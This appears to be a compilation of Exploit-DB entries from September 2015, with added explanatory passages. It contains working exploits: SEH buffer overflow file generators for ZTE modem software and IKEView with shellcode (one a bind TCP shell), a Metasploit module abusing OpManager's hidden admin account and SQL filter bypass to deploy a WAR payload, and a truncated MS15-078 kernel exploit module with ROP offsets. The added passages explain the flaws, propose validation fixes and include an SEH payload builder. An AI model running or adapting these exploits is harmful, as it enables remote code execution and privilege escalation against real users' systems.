https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip
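The arithmetic the advisory walks through, (rows - 1) * stride + base with no check against the allocation size, is the whole bug. The following added example (not Microsoft's or OGL's code) emulates that unchecked 32-bit computation with the values quoted on the page, and puts beside it the check that ValidateBitmapInfo is said to lack: compute the bytes the bitmap would cover in unbounded arithmetic and refuse anything that does not fit the allocation before a pointer is ever formed. The row_stride helper uses the usual 4-byte-aligned DIB scanline rule, which is an assumption here since the page only says edx is computed earlier in the function; base, row count, stride and allocation size are the page's figures.

```python
from typing import Optional

MASK32 = 0xFFFFFFFF


def row_stride(width: int, bits_per_pixel: int) -> int:
    """Bytes per scanline padded to a 4-byte boundary (the common DIB rule;
    an assumption for this example, the page does not show how edx is derived)."""
    return ((width * bits_per_pixel + 31) // 32) * 4


def unchecked_last_row_ptr(base: int, rows: int, stride: int) -> int:
    """Emulates the lea/imul/add sequence from the advisory with 32-bit
    wraparound and no validation: edi = (ebx - 1) * edx + [ebp+arg_4]."""
    return (((rows - 1) & MASK32) * stride + base) & MASK32


def checked_last_row_ptr(base: int, rows: int, stride: int,
                         alloc_size: int) -> Optional[int]:
    """Return the same pointer only if every scanline lies inside the
    allocation; None otherwise. The arithmetic is done in unbounded
    integers, so neither the product nor the pointer add can silently wrap."""
    if rows <= 0 or stride <= 0 or alloc_size < 0:
        return None
    if rows > MASK32 or stride > MASK32:       # not representable in the header anyway
        return None
    needed = rows * stride                     # bytes the bitmap would cover
    if needed > alloc_size:                    # the PoC fails here: 0x666f * 0x13350 >> 15156
        return None
    ptr = base + (rows - 1) * stride
    if ptr > MASK32:                           # would wrap the 32-bit address space
        return None
    return ptr


if __name__ == "__main__":
    # Figures from the advisory: base pointer, ebx (rows), edx (stride),
    # original allocation size of the chunk at the base pointer.
    base, rows, alloc = 0xF9EF540, 0x666F, 15156
    for stride in (0x13350, 0x27FD0):
        bad = unchecked_last_row_ptr(base, rows, stride)
        good = checked_last_row_ptr(base, rows, stride, alloc)
        print(f"stride={stride:#x}: unchecked edi={bad:#010x} "
              f"({'below base' if bad < base else 'past end'}), checked -> {good}")
    # A small, well-formed bitmap for comparison (constructed values).
    print("4 rows of 16 bytes in a 64-byte buffer ->",
          hex(checked_last_row_ptr(0x1000, 4, 16, 64)))
```

With the first stride the unchecked value lands at 0x8a94e1a0, far past a 15156-byte allocation, which is the out-of-bounds read in the crash; with the second the product is 0xffffcb60 and the pointer add wraps to below the base pointer. The checked version rejects both on the size comparison alone, which is the check a bitmap header validator needs before any LockBits-style conversion runs.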
-
ZTE PC UI USB Modem Software - Local Buffer Overflow
#!/usr/bin/python -w
# Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow
# Date : 17/09/2015
# Author : R-73eN
# Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02
# Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE)
# The problem exists into the import function at PhoneBook Menu which doesn't
# validate data and importing a malformed file leads to code execution.
#
# Triggering the Vulnerability
# run this python script which will save an evil.txt file.
# Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File
# A calculator Should pop up.
#
# Disclosure Timeline:
# [16/08/2015] - Vendor notified
# [18/08/2015] - Vendor Responded asking for more details
# [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life.
#
# Solution:
# Don't import unknown text file.
#
# Video - https://www.youtube.com/watch?v=jbv1L4TrHTY
#

banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner

shellcode = ""
#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f"
shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25"
shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d"
shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5"
shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b"
shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8"
shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc"
shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93"
shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36"
shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06"
shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e"
shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c"
shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1"
shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c"
shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4"
shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef"
shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"

filename="evil.txt"
nSEH = "\xEB\x06\x90\x90"
SEH = "\xab\x11\x9f\x0f"
buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Evil.txt created successfully [+]"
-
IKEView.exe R60 - '.elg' Local (SEH)
# Exploit Title: IKEView.exe R60 localSEH Exploit
# Date: 17/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450
# Category: Local
#[+] Gr337z: hyp3rlinx for finding the bug
#[+] Source:
#http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt
# exploit has been tested on win XP professional sp2
#Vendor:
#================================
#www.checkpoint.com
#http://pingtool.org/downloads/IKEView.exe

#!/usr/bin/env python
file="IKEView.elg"
x=open(file,"w")
nseh = "\x90\x90\xeb\x32" #short jump
seh = "\xc0\x28\x40\x00" #pop pop ret
nopsled = "\x90"*50
#badchars += "\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buf = "\x33\xc0"                #=> XOR EAX,EAX       | Zero out EAX register
buf += "\x50"                   #=> PUSH EAX          | Push EAX to have null-byte padding for "calc.exe"
buf += "\x68\x2E\x65\x78\x65"   #=> PUSH ".exe"       | Push The ASCII string to the stack
buf += "\x68\x63\x61\x6C\x63"   #=> PUSH "calc"       |
buf += "\x8B\xC4"               #=> MOV EAX,ESP       | Put a pointer to the ASCII string in EAX
buf += "\x6A\x01"               #=> PUSH 1            | Push uCmdShow parameter to the stack
buf += "\x50"                   #=> PUSH EAX          | Push the pointer to lpCmdLine to the stack
buf += "\xBB\x4d\x11\x86\x7C"   #=> MOV EBX,7C86114d  | Move the pointer to WinExec() into EBX
buf += "\xFF\xD3"               #=> CALL EBX
buf += "\x33\xc0"               #=> XOR EAX,EAX       | Zero out EAX register
buf += "\x50"                   #=> PUSH EAX          | Push EAX
buf += "\xBB\xa2\xca\x81\x7c"   #=> MOV EBX,7C81caa2  | Exit process
buf += "\xFF\xD3"               #=> CALL EBX
junk = "A"*(4424)
payload = junk + nseh + seh + nopsled + buf
x.write(payload)
x.close()
-
ManageEngine OpManager - Remote Code Execution (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # It removes a large object in the database; shouldn't be a problem, but just in case....
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ManageEngine OpManager Remote Code Execution',
      'Description'    => %q{
        This module exploits a default credential vulnerability in ManageEngine
        OpManager, where a default hidden account "IntegrationUser" with
        administrator privileges exists. The account has a default password of
        "plugin" which cannot be reset through the user interface. By logging in
        and abusing the default administrator's SQL query functionality, it's
        possible to write a WAR payload to disk and trigger an automatic
        deployment of this payload. This module has been tested successfully on
        OpManager v11.5 and v11.6 for Windows.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '38174' ],
        ],
      'Platform'       => ['java'],
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          ['ManageEngine OpManager v11.6', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 14 2015',
      'DefaultTarget'  => 0))
  end

  def uri
    target_uri.path
  end

  def check
    # Check version
    vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'LoginPage.do')
    })

    unless res && res.code == 200
      return Exploit::CheckCode::Safe
    end

    if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
      version = $1
      if Gem::Version.new(version) <= Gem::Version.new('11.6')
        return Exploit::CheckCode::Appears
      else
        # Patch unknown
        return Exploit::CheckCode::Detected
      end
    elsif res.body =~ /OpManager/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def sql_query(key, query)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
      'vars_get'  => { 'apiKey' => key },
      'vars_post' => { 'query' => query }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Query was not successful!")
    end

    res
  end

  def exploit
    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'jsp', 'Login.do'),
      'vars_post' => {
        'domainName' => 'NULL',
        'authType'   => 'localUserLogin',
        'userName'   => 'IntegrationUser', # Hidden user
        'password'   => 'plugin'           # Password of hidden user
      }
    })

    if res && res.code == 302
      redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
      print_status("#{peer} - Location is [ #{redirect} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
    end

    # Follow redirection process
    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri'    => redirect,
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
      api_key = $1
      print_status("#{peer} - Retrieved API key [ #{api_key} ]")
    else
      fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
    end

    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
    war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')

    print_status("#{peer} - Executing SQL queries")

    # Remove large object in database, just in case it exists from previous exploit attempts
    sql = 'SELECT lo_unlink(-1)'
    sql_query(api_key, sql)

    # Create large object "-1". We use "-1" so we will not accidentally overwrite large objects in use by other tasks.
    sql = 'SELECT lo_create(-1)'
    result = sql_query(api_key, sql)
    if result.body =~ /lo_create":([0-9]+)}/
      lo_id = $1
    else
      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
    end

    # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager's checks for INSERT/UPDATE/DELETE, etc.
    sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
    sql_query(api_key, sql)

    # Export our large object id data into a WAR file
    sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
    sql_query(api_key, sql)

    # Remove our large object in the database
    sql = 'SELECT lo_unlink(-1)'
    sql_query(api_key, sql)

    register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
    register_file_for_cleanup("tomcat//webapps//#{app_base}")

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
        'method' => 'GET'
      })

      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
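The module's comment explains the `INSERT/**/INTO` trick: OpManager's SubmitQuery endpoint refuses write statements, but the check does not see a comment as the separator between the keyword and what follows. The example below is added here and is not the module's or OpManager's code; the module does not describe the filter, so the "keyword followed by whitespace" regex is an assumption about its shape. It contrasts that check with one that strips comments and tokenizes before deciding, and that also refuses the PostgreSQL server-side file functions the module relies on afterwards (`lo_export` writes the WAR to disk from inside a syntactically harmless SELECT).

```python
import re

# Keywords a "read-only" SQL console would want to refuse. This list is ours, not OpManager's.
WRITE_KEYWORDS = ("INSERT", "UPDATE", "DELETE", "DROP", "ALTER", "CREATE", "TRUNCATE", "GRANT", "COPY")

# PostgreSQL functions that modify the database or touch the filesystem even when called from a SELECT.
UNSAFE_FUNCTIONS = re.compile(
    r"\b(lo_export|lo_import|lo_create|lo_unlink|pg_read_file|pg_read_binary_file|pg_file_write)\s*\(",
    re.I,
)


def naive_is_read_only(query):
    """Assumed shape of the bypassed filter: a write keyword followed by whitespace is rejected.

    'INSERT/**/INTO' (or 'INSERT--\\nINTO') puts a comment where the whitespace is expected,
    so the regex never matches and the statement is allowed through."""
    pattern = r"\b(" + "|".join(WRITE_KEYWORDS) + r")\s"
    return re.search(pattern, query, re.I) is None


def strip_sql_comments(query):
    """Replace /* ... */ and -- comments with a space so tokens split by them become adjacent again."""
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    query = re.sub(r"--[^\r\n]*", " ", query)
    return query


def hardened_is_read_only(query):
    """Normalise first, decide second: strip comments, reject stacked statements, tokenise,
    require the statement to start with SELECT, refuse write keywords anywhere in it and
    refuse functions that write through the database server."""
    cleaned = strip_sql_comments(query)
    if ";" in cleaned.rstrip().rstrip(";"):
        return False                      # stacked statements: SELECT 1; DROP TABLE ...
    tokens = [t.upper() for t in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", cleaned)]
    if not tokens or tokens[0] != "SELECT":
        return False
    if any(t in WRITE_KEYWORDS for t in tokens):
        return False
    if UNSAFE_FUNCTIONS.search(cleaned):
        return False
    return True
```

Even the hardened version is a blocklist and will reject some legitimate queries (a string literal containing a semicolon or the word "insert"); the robust fix is to execute console queries as a database role that can only read, rather than to pattern-match SQL.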
-
IKEView R60 - Local Buffer Overflow (SEH)
#!/usr/bin/python
# EXPLOIT TITLE: IKEView R60 Buffer overflow(SEH) Local Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: hyp3rlinx
# Date of Testing: 17th September 2015
# Download Link : https://www.exploit-db.com/apps/e74a3dcf9bd8a2dd05026532fbf9bb36-IKEView.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called key.elg
# Step 3: Open this file with IKEView.exe
#         That should open a bind tcp port at 4444
# Step 4: Connect with netcat at port 4444

file = open('key.elg', 'w')

# bad characters - \x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20
# junk | nSEH (short jump +0x18 into the sled) | SEH (pop pop ret) | NOP sled
buffer = "A" * 4424 + "\xEB\x18\x90\x90" + "\xc0\x28\x40\x00" + "\x90" * 30

# msfvenom -p windows/shell_bind_tcp -b '\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20' -f c
buffer += ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3\x9f"
           "\x17\x99\x83\xeb\xfc\xe2\xf4\x5f\x77\x95\x99\xa3\x9f\x77\x10"
           "\x46\xae\xd7\xfd\x28\xcf\x27\x12\xf1\x93\x9c\xcb\xb7\x14\x65"
           "\xb1\xac\x28\x5d\xbf\x92\x60\xbb\xa5\xc2\xe3\x15\xb5\x83\x5e"
           "\xd8\x94\xa2\x58\xf5\x6b\xf1\xc8\x9c\xcb\xb3\x14\x5d\xa5\x28"
           "\xd3\x06\xe1\x40\xd7\x16\x48\xf2\x14\x4e\xb9\xa2\x4c\x9c\xd0"
           "\xbb\x7c\x2d\xd0\x28\xab\x9c\x98\x75\xae\xe8\x35\x62\x50\x1a"
           "\x98\x64\xa7\xf7\xec\x55\x9c\x6a\x61\x98\xe2\x33\xec\x47\xc7"
           "\x9c\xc1\x87\x9e\xc4\xff\x28\x93\x5c\x12\xfb\x83\x16\x4a\x28"
           "\x9b\x9c\x98\x73\x16\x53\xbd\x87\xc4\x4c\xf8\xfa\xc5\x46\x66"
           "\x43\xc0\x48\xc3\x28\x8d\xfc\x14\xfe\xf7\x24\xab\xa3\x9f\x7f"
           "\xee\xd0\xad\x48\xcd\xcb\xd3\x60\xbf\xa4\x60\xc2\x21\x33\x9e"
           "\x17\x99\x8a\x5b\x43\xc9\xcb\xb6\x97\xf2\xa3\x60\xc2\xf3\xab"
           "\xc6\x47\x7b\x5e\xdf\x47\xd9\xf3\xf7\xfd\x96\x7c\x7f\xe8\x4c"
           "\x34\xf7\x15\x99\xb2\xc3\x9e\x7f\xc9\x8f\x41\xce\xcb\x5d\xcc"
           "\xae\xc4\x60\xc2\xce\xcb\x28\xfe\xa1\x5c\x60\xc2\xce\xcb\xeb"
           "\xfb\xa2\x42\x60\xc2\xce\x34\xf7\x62\xf7\xee\xfe\xe8\x4c\xcb"
           "\xfc\x7a\xfd\xa3\x16\xf4\xce\xf4\xc8\x26\x6f\xc9\x8d\x4e\xcf"
           "\x41\x62\x71\x5e\xe7\xbb\x2b\x98\xa2\x12\x53\xbd\xb3\x59\x17"
           "\xdd\xf7\xcf\x41\xcf\xf5\xd9\x41\xd7\xf5\xc9\x44\xcf\xcb\xe6"
           "\xdb\xa6\x25\x60\xc2\x10\x43\xd1\x41\xdf\x5c\xaf\x7f\x91\x24"
           "\x82\x77\x66\x76\x24\xe7\x2c\x01\xc9\x7f\x3f\x36\x22\x8a\x66"
           "\x76\xa3\x11\xe5\xa9\x1f\xec\x79\xd6\x9a\xac\xde\xb0\xed\x78"
           "\xf3\xa3\xcc\xe8\x4c")

file.write(buffer)
file.close()
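Both IKEView exploits above, and the evil.txt generator at the top of this page, use the same SEH layout: junk up to the overwritten record, a short jump in nSEH, a POP/POP/RET address in SEH, then a sled and shellcode. The arithmetic is easy to get wrong (the jump displacement is relative to the end of the two-byte instruction, and the shellcode must not contain the application's bad characters). The following is an added example, not code from either exploit: a small builder that lays the file out, checks the shellcode against a bad-character set (the set is the one the OPTIMUS exploit passes to msfvenom), and decodes the jump back out of the finished payload to confirm where execution lands. The 4424-byte offset and the 0x004028c0 gadget are taken from the exploits; the INT3 stand-in shellcode is constructed for the demo.

```python
import struct

# Bad characters the OPTIMUS exploit above excludes from its msfvenom payload (constructed set for this demo).
BAD_CHARS = frozenset([0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x20])


def short_jmp(distance):
    """Encode 'jmp short rel8' (EB xx). The displacement is relative to the END of the 2-byte instruction."""
    if not -128 <= distance <= 127:
        raise ValueError("short jump displacement out of range: %d" % distance)
    return b"\xeb" + struct.pack("<b", distance)


def bad_bytes(data, bad_chars=BAD_CHARS):
    """Sorted list of forbidden byte values present in data; an empty list means the buffer is clean."""
    return sorted(set(data) & set(bad_chars))


def build_seh_overflow(offset_to_nseh, pop_pop_ret, shellcode, nop_count=30, bad_chars=BAD_CHARS):
    """Build junk | nSEH | SEH | NOP sled | shellcode and return (payload, layout).

    offset_to_nseh: junk bytes before the overwritten nSEH field (4424 in both IKEView exploits)
    pop_pop_ret:    address of a POP/POP/RET gadget, packed little-endian into the SEH field
    """
    bad = bad_bytes(shellcode, bad_chars)
    if bad:
        raise ValueError("shellcode contains bad chars: " + ", ".join("0x%02x" % b for b in bad))

    # POP POP RET returns into nSEH. From the end of the 2-byte jump there are 2 padding bytes
    # and the 4-byte SEH field before the sled, so the displacement is 6: EB 06 90 90.
    nseh = short_jmp(2 + 4) + b"\x90\x90"
    seh = struct.pack("<I", pop_pop_ret)
    sled = b"\x90" * nop_count

    layout = {
        "nseh": offset_to_nseh,
        "seh": offset_to_nseh + 4,
        "sled": offset_to_nseh + 8,
        "shellcode": offset_to_nseh + 8 + nop_count,
    }
    payload = b"A" * offset_to_nseh + nseh + seh + sled + shellcode
    return payload, layout


def jump_target(payload, nseh_offset):
    """Decode the short jump stored at nSEH and return the absolute payload offset execution lands on."""
    opcode = payload[nseh_offset]
    rel8 = struct.unpack("<b", payload[nseh_offset + 1:nseh_offset + 2])[0]
    if opcode != 0xEB:
        raise ValueError("no short jump at nSEH (found 0x%02x)" % opcode)
    return nseh_offset + 2 + rel8


if __name__ == "__main__":
    # Constructed stand-in for real shellcode: INT3s, so a debugger attached to IKEView stops on arrival.
    demo_shellcode = b"\xcc" * 8
    payload, layout = build_seh_overflow(4424, 0x004028c0, demo_shellcode)
    target = jump_target(payload, layout["nseh"])
    if not layout["sled"] <= target < layout["shellcode"]:
        raise SystemExit("jump does not land in the sled")
    with open("key.elg", "wb") as f:
        f.write(payload)
```

Note that the POP/POP/RET address 0x004028c0 contains a null byte; it is last in the little-endian encoding, which is why both exploits get away with it even though 0x00 is on their bad-character list for the shellcode.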
-
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking

  WIN32K_VERSIONS = [
    '6.3.9600.17393',
    '6.3.9600.17630',
    '6.3.9600.17694',
    '6.3.9600.17796',
    '6.3.9600.17837',
    '6.3.9600.17915'
  ]

  NT_VERSIONS = [
    '6.3.9600.17415',
    '6.3.9600.17630',
    '6.3.9600.17668',
    '6.3.9600.17936'
  ]

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
      'Description'    => %q{
        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
        a malformed font. The vulnerability was exploited by Hacking Team and disclosed in the
        July data leak. This module has been tested successfully on vulnerable builds of
        Windows 8.1 x64.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Eugene Ching',    # vulnerability discovery and exploit
        'Mateusz Jurczyk', # vulnerability discovery
        'Cedric Halbronn', # vulnerability and exploit analysis
        'juan vazquez'     # msf module
      ],
      'Arch'           => ARCH_X86_64,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        [ 'Windows 8.1 x64', { } ]
      ],
      'Payload'        => {
        'Space'       => 4096,
        'DisableNops' => true
      },
      'References'     => [
        ['CVE', '2015-2426'],
        ['CVE', '2015-2433'],
        ['MSB', 'MS15-078'],
        ['MSB', 'MS15-080'],
        ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
        ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
        ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
        ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
      ],
      'DisclosureDate' => 'Jul 11 2015',
      'DefaultTarget'  => 0
    }))
  end

  # The reflective DLL carries one unique 64-bit marker per offset; each marker is
  # replaced with the offset for the target's win32k.sys build before injection.
  def patch_win32k_offsets(dll)
    @win32k_offsets.each do |k, v|
      case k
      when 'info_leak'
        dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
      when 'pop_rax_ret'
        dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp'
        dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool'
        dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
      when 'pop_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
      when 'deref_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
      when 'pop_rbx_ret'
        dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
      when 'ret'
        dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_r11_ret'
        dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
      when 'add_rax_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
      when 'pop_rsp_ret'
        dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp_adjust'
        dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
      when 'chwnd_delete'
        dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
      end
    end
  end

  def set_win32k_offsets
    @win32k_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17393'
        {
          'info_leak'           => 0x3cf00,
          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6e314,  # ret C3
          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17630'
        {
          'info_leak'           => 0x3d200,
          'pop_rax_ret'         => 0x19e9b,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6024,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x84f4f,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3f7f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3f82,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbb93,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x146EE0  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17694'
        {
          'info_leak'           => 0x3d300,
          'pop_rax_ret'         => 0x151f4,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x600c,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x2cf10,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3757,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc375a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x6682,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6683,   # ret C3
